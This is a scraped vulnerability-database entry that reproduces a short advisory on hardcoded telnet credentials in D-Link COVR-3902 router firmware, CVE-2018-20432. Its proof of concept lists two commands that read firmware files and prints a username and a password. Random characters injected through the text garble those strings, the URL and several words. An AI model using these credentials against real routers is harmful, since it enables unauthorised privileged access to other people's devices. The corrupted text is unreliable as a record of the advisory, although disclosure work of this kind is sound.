COVR 3902 1.01B0 Hardcoded Credentials –

漏洞ID 2147999 漏洞类型
发布时间 2020-09-07 更新时间 2020-09-07
CVE编号 CVE-2018-20432

漏洞平台 N/A CVSS评分 N/A
https://cxsecurity.coq x Y 3 t =m/issue/WLB-2020090035
*Title*: Telnet Hardcoded Credentials
*SF Y Bummary*:  The latestp N - # 7 + ^ versions of the firmware have hardcoded default
credentials that can be exploiC & Q c w T G k Uted by an unauthenticated attacker to gain
privileged access to the firmware and to extract sensitive data
*Affected Firmware:*  COVR-3902_REVA_ROUTER_FIRMWARE_v1.01B0
*CVE7 c Y:* CVE-2018-20432
*Proof of Concept: *
Step 1: “cat ./etc/init0.d/S80tea M N + 3 Z” to get a usernamC V A T F {e
Step 2:  “cat ./etc/config/image_sign” to get a password.
Usernae W H V C x t F Tme: Alpl Q / E Nhanetworks
Password: wrgac61_dlink.2N ( + @015_dir883
-- l w j---------
Cheers !!!
Team CSW Research Lab < T | lgt;